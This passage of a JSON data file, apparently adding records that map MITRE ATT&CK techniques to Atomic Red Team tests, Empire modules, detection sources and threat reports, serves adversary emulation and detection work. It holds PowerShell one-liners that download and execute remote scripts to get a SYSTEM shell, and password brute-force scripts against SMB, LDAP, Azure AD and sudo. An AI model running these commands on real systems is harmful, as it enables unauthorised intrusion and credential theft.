an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.justice.gov/opa/press-release/file/1084361/download", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://securelist.com/muddywater/88059/", + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1106", + "command_list": [ + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"#{output_file}\" /target:exe PathToAtomicsFolder\\T1106\\src\\CreateProcess.cs\n%tmp%/T1106.exe\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"%tmp%\\T1106.exe\" /target:exe #{source_file}\n%tmp%/T1106.exe\n", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')", + "python/situational_awareness/network/dcos/chronos_api_add_job", + "python/situational_awareness/network/dcos/chronos_api_delete_job", + "python/situational_awareness/network/dcos/chronos_api_start_job", + "python/situational_awareness/network/dcos/marathon_api_create_start_app", + "python/situational_awareness/network/dcos/marathon_api_delete_app", + "python/situational_awareness/network/http_rest_api" + ], + "commands": [ + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"#{output_file}\" /target:exe PathToAtomicsFolder\\T1106\\src\\CreateProcess.cs\n%tmp%/T1106.exe\n", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team Test - Native API" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"%tmp%\\T1106.exe\" /target:exe #{source_file}\n%tmp%/T1106.exe\n", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team Test - Native API" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team Test - Native API" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team Test - Native API" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')", + "source": "atomics/T1106/T1106.yaml", + "name": "Atomic Red Team Test - Native API" + }, + { + "command": "python/situational_awareness/network/dcos/chronos_api_add_job", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/dcos/chronos_api_delete_job", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/dcos/chronos_api_start_job", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/dcos/marathon_api_create_start_app", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/dcos/marathon_api_delete_app", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/http_rest_api", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1106", + "display_name": "Native API", + "atomic_tests": [ + { + "name": "Execution through API - CreateProcess", + "auto_generated_guid": "99be2089-c52d-4a4a-b5c3-261ee42c8b62", + "description": "Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "source_file": { + "description": "Location of the CSharp source file to compile and execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1106\\src\\CreateProcess.cs" + }, + "output_file": { + "description": "Location of the payload", + "type": "Path", + "default": "%tmp%\\T1106.exe" + } + }, + "executor": { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"#{output_file}\" /target:exe #{source_file}\n%tmp%/T1106.exe\n", + "name": "command_prompt" + } + }, + { + "name": "WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique", + "auto_generated_guid": "ce4e76e6-de70-4392-9efe-b281fc2b4087", + "description": "Get SYSTEM shell - Pop System Shell using CreateProcess technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')", + "name": "powershell" + } + }, + { + "name": "WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique", + "auto_generated_guid": "7ec5b74e-8289-4ff2-a162-b6f286a33abd", + "description": "Get SYSTEM shell - Bind System Shell using CreateProcess technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')", + "name": "powershell" + } + }, + { + "name": "WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique", + "auto_generated_guid": "e1f93a06-1649-4f07-89a8-f57279a7d60e", + "description": "Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')", + "name": "powershell" + } + } + ] + }, + { + "Empire Module": "python/situational_awareness/network/dcos/chronos_api_add_job", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "T1168", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/chronos_api_add_job\": [\"T1106\",\"T1168\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/chronos_api_delete_job", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "T1168", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/chronos_api_delete_job\": [\"T1106\",\"T1168\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/chronos_api_start_job", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "T1168", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/chronos_api_start_job\": [\"T1106\",\"T1168\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/marathon_api_create_start_app", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/marathon_api_create_start_app\": [\"T1106\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/marathon_api_delete_app", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/marathon_api_delete_app\": [\"T1106\"]," + }, + { + "Empire Module": "python/situational_awareness/network/http_rest_api", + "ATT&CK Technique #1": "T1106", + "ATT&CK Technique #2": "", + "Technique": "Execution through API", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/http_rest_api\": [\"T1106\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1110.001", + "command_list": [ + "echo Password1> passwords.txt\necho 1q2w3e4r>> passwords.txt\necho Password!>> passwords.txt\necho Spring2022>> passwords.txt\necho ChangeMe!>> passwords.txt\n@FOR /F \"delims=\" %p in (passwords.txt) DO @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%username%\" \"%p\" 1>NUL 2>&1 && @echo [*] %username%:%p && @net use /delete %logonserver%\\IPC$ > NUL\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"$ENV:USERNAME\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account $ENV:USERNAME.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] $ENV:USERNAME:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path PathToAtomicsFolder\\T1110.001\\src\\passwords.txt\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "Import-Module -Name AzureAD\n\n$passwords = \"#{passwords}\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account bruce.wayne@contoso.com.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] bruce.wayne@contoso.com:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "Import-Module -Name AzureAD\n\n$passwords = \"Password1`n1q2w3e4r`nPassword!\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account #{username}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{username}:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] #{username}:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n", + "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n" + ], + "commands": [ + { + "command": "echo Password1> passwords.txt\necho 1q2w3e4r>> passwords.txt\necho Password!>> passwords.txt\necho Spring2022>> passwords.txt\necho ChangeMe!>> passwords.txt\n@FOR /F \"delims=\" %p in (passwords.txt) DO @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%username%\" \"%p\" 1>NUL 2>&1 && @echo [*] %username%:%p && @net use /delete %logonserver%\\IPC$ > NUL\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"$ENV:USERNAME\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account $ENV:USERNAME.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] $ENV:USERNAME:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path PathToAtomicsFolder\\T1110.001\\src\\passwords.txt\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "Import-Module -Name AzureAD\n\n$passwords = \"#{passwords}\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account bruce.wayne@contoso.com.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] bruce.wayne@contoso.com:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "Import-Module -Name AzureAD\n\n$passwords = \"Password1`n1q2w3e4r`nPassword!\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account #{username}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{username}:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] #{username}:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n 